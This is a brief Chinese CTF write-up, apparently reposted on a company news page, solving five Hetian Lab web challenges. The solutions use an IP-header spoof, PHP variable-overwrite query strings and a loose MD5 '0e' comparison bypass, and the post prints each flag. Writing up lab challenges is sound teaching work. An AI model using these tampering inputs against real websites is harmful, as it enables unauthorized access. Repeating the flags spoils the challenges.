你的位置:首页 > 信息动态 > 新闻中心
信息动态
联系我们

合天网安 在线实验 CTF竞赛 wp(第十六周 | 有点另类的SSRF、第十七周 | 给你扔了串代码、第十八周 | 学会变量覆盖、第十九周 | Easy PHP、第二十周 | 最后一道变量覆盖)

2021/12/18 12:49:52

文章目录

  • 第十六周 | 有点另类的SSRF
  • 第十七周 | 给你扔了串代码
  • 第十八周 | 学会变量覆盖
  • 第十九周 | Easy PHP
  • 第二十周 | 最后一道变量覆盖

第十六周 | 有点另类的SSRF

handler参数后加上&admin=1,X-Client-Ip:127.0.0.1
在这里插入图片描述
提示访问source.txt看到源码
在这里插入图片描述
flag的所在目录为/opt/flag1.txt
flag{0123_hetianlab_hunan}


第十七周 | 给你扔了串代码

在这里插入图片描述
url后面加上?_200=flag,然后POST提交一个flag=
在这里插入图片描述

第十八周 | 学会变量覆盖

在这里插入图片描述
?gift=&flag=
在这里插入图片描述
flag{hetianlab}


第十九周 | Easy PHP

变量覆盖?flag1=flag&flag=flag1
在这里插入图片描述
在这里插入图片描述
flag{asdhetianlab}


第二十周 | 最后一道变量覆盖

在这里插入图片描述
parse_str用于将$id传来的值以键值对的方式再次赋值,所以可以通过它来改变变量的值,又因为md5是php若比较
?id=a[0]=s878926199a(MD5为0e545993274517709034328855841020,也以0e开头),得到flag
在这里插入图片描述
flag{28c5be9426611a12}